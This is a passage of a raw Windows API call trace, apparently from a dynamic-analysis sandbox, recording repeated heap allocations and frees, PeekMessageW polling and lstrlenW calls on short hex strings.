returned 0x29ec820 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71258 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71378 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71228 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0085.909] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee398 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71308 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711d8 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71358 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71358 | out: hHeap=0x2af0000) returned 1 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711d8 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71358 [0085.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71308 | out: hHeap=0x2af0000) returned 1 [0085.910] lstrlenW (lpString="62") returned 2 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71358 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712e8 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.911] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.911] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712a8 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71228 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71268 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711f8 [0085.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.912] lstrlenW (lpString="6F") returned 2 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71228 | out: hHeap=0x2af0000) returned 1 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71268 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.912] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.912] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71288 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71208 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711d8 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71268 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712a8 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71348 [0085.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.913] lstrlenW (lpString="6F") returned 2 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eef38 | out: hHeap=0x2af0000) returned 1 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.914] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.914] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712c8 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71348 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711d8 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71268 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71268 | out: hHeap=0x2af0000) returned 1 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712d8 [0085.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71208 [0085.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.915] lstrlenW (lpString="6C") returned 2 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71278 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71278 | out: hHeap=0x2af0000) returned 1 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.915] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0085.915] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76658 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76568 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee110 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a765b8 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eda80 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a763b0 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76270 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0085.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2c8 [0085.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 